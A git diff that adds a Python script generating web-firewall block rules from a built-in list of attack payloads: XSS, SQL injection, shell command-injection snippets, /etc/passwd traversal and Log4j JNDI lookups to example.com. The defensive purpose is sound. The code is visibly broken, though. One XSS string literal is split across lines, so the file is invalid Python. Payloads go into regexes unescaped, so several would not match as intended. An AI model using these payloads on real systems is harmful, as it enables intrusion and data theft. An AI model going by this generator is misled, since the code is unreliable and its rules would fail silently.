diff --git a/get_vulnerability_rules.py b/get_vulnerability_rules.py
new file mode 100644
index 0000000..dad6bb8
--- /dev/null
+++ b/get_vulnerability_rules.py
@@ -0,0 +1,76 @@
+import json
+import logging
+
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+
+def generate_vulnerability_rules(output_path):
+ """Generates rules from a predefined list of vulnerability payloads."""
+ all_rules = []
+ payloads = {
+ "xss": {
+ "patterns": [
+ "",
+ "
",
+ "javascript:alert(1)",
+ "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" #base64 encoded script tag
+ ],
+ "targets": ["ARGS", "BODY", "HEADERS"]
+ },
+ "sqli": {
+ "patterns": [
+ "1' OR '1'='1",
+ "'; SELECT * FROM users;",
+ "\" OR \"1\"=\"1",
+ "UNION SELECT 1,2,3;"
+ ],
+ "targets": ["ARGS", "BODY", "HEADERS"]
+ },
+ "rce": {
+ "patterns": [
+ "`whoami`",
+ "$(whoami)",
+ "; ls -la;",
+ "| id"
+ ],
+ "targets": ["ARGS", "HEADERS"]
+ },
+ "lfi":{
+ "patterns":[
+ "../etc/passwd",
+ "../../../../etc/passwd"
+ ],
+ "targets":["URI"]
+ },
+ "log4j": {
+ "patterns": [
+ "${jndi:ldap://example.com/a}",
+ "${jndi:rmi://example.com/b}",
+ "${jndi:dns://example.com/c}"
+ ],
+ "targets": ["ARGS", "BODY", "HEADERS"]
+ },
+ }
+
+ rule_counter = 0
+ for vuln_type, data in payloads.items():
+ for pattern in data["patterns"]:
+ rule = {
+ "id": f"{vuln_type}-{rule_counter}",
+ "phase": 2,
+ "pattern": f"(?i){pattern}",
+ "targets": data["targets"],
+ "severity": "HIGH",
+ "action": "block",
+ "score": 7,
+ "description": f"Detects {vuln_type} attack payload: {pattern}"
+ }
+ all_rules.append(rule)
+ rule_counter += 1
+ logging.info(f"Generated {len(all_rules)} rules from vulnerability payloads.")
+ with open(output_path, 'w') as f:
+ json.dump(all_rules, f, indent=2)
+ logging.info(f"Saved {len(all_rules)} rules to {output_path}")
+
+if __name__ == "__main__":
+ output_path = "vulnerability_rules.json"
+ generate_vulnerability_rules(output_path)